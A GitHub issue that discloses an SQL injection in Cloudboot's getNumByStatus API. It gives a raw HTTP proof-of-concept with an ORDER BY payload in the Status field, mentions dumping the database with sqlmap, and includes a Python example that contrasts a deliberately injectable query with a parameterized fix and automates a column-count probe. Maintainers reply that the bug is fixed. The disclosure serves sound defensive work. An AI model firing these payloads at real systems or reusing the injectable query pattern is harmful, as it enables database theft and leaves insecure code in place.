Cloudboot has SQL injection #22

Open
allen909 opened this issue Sep 5, 2019 · 2 comments

allen909 commented Sep 5, 2019

A SQL injection was discovered in Cloudboot.
There is a SQL injection vulnerability in /api/osinstall/v1/device/getNumByStatus which allows remote attackers to inject SQL commands.

PoC:
POST /api/osinstall/v1/device/getNumByStatus HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

{"Status":"1'order by 2#","UserID":0}

"Status" is the injection point

Use sqlmap to get the database
[image: sqlmap output]
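The PoC above probes the column count with an ORDER BY clause spliced into the quoted Status value. The following is an added example, not code from the Cloudboot project or from the issue author: it reconstructs the vulnerable pattern (string concatenation into the query text) beside the parameterized fix, and replays the ORDER BY probe against both. The table, rows, and handler names are assumptions for illustration; the example runs on SQLite, which uses the `--` comment instead of MySQL's `#` used in the issue's payload.

```python
import json
import sqlite3


def make_db():
    """Constructed sample data: a stand-in for a device table (not Cloudboot's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE device (
            id INTEGER PRIMARY KEY, sn TEXT, status TEXT, user_id INTEGER
        );
        INSERT INTO device (sn, status, user_id) VALUES
            ('SN001', 'success', 0),
            ('SN002', 'success', 0),
            ('SN003', 'failure', 0),
            ('SN004', 'pre_install', 7);
        """
    )
    return conn


def get_num_by_status_vulnerable(conn, status, user_id):
    # Hypothetical reconstruction of the flaw: the Status value becomes part of
    # the SQL text, so a quote in it terminates the literal and the rest is parsed as SQL.
    sql = "SELECT COUNT(*) FROM device WHERE status = '%s' AND user_id = %d" % (status, user_id)
    return conn.execute(sql).fetchone()[0]


def get_num_by_status_fixed(conn, status, user_id):
    # Hardened form: placeholders keep Status a data value, never SQL syntax.
    sql = "SELECT COUNT(*) FROM device WHERE status = ? AND user_id = ?"
    return conn.execute(sql, (status, user_id)).fetchone()[0]


def handle_get_num_by_status(conn, body, query_fn):
    """Assumed request handler: body is the JSON shape from the PoC, {"Status":..., "UserID":...}."""
    params = json.loads(body)
    return query_fn(conn, str(params["Status"]), int(params["UserID"]))


def probe_column_count(conn, query_fn, max_cols=5):
    """Replay the PoC's ORDER BY probe.

    ORDER BY n succeeds while n <= number of selected columns and errors once
    it exceeds it, so the first failing n reveals n-1 columns. Against a
    parameterized query the payload is just an unmatched status string: no
    error is ever raised and the probe learns nothing (returns None).
    """
    for n in range(1, max_cols + 1):
        payload = "success' order by %d-- " % n  # '--' is SQLite's comment; the issue uses MySQL '#'
        try:
            handle_get_num_by_status(
                conn, json.dumps({"Status": payload, "UserID": 0}), query_fn
            )
        except sqlite3.OperationalError:
            return n - 1
    return None


if __name__ == "__main__":
    db = make_db()
    legit = '{"Status":"success","UserID":0}'
    print("legit count (vulnerable):", handle_get_num_by_status(db, legit, get_num_by_status_vulnerable))
    print("legit count (fixed):     ", handle_get_num_by_status(db, legit, get_num_by_status_fixed))
    print("columns leaked (vulnerable):", probe_column_count(db, get_num_by_status_vulnerable))
    print("columns leaked (fixed):     ", probe_column_count(db, get_num_by_status_fixed))
```

Both handlers return the same count for a legitimate Status, which is why the bug is invisible to functional tests; the difference only appears when the value carries a quote. The probe is also the cheapest check a reviewer can run against a suspect endpoint: a 500 on `order by N` but a 200 on `order by N-1` is the injection signature the PoC relies on.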

@xibolun xibolun added the bug label Jul 27, 2020

xibolun commented Jul 27, 2020

Yes it is. Already fixed in the enterprise version.

@attritionorg

@kedadiannao220 Could you link to a fixing commit please?
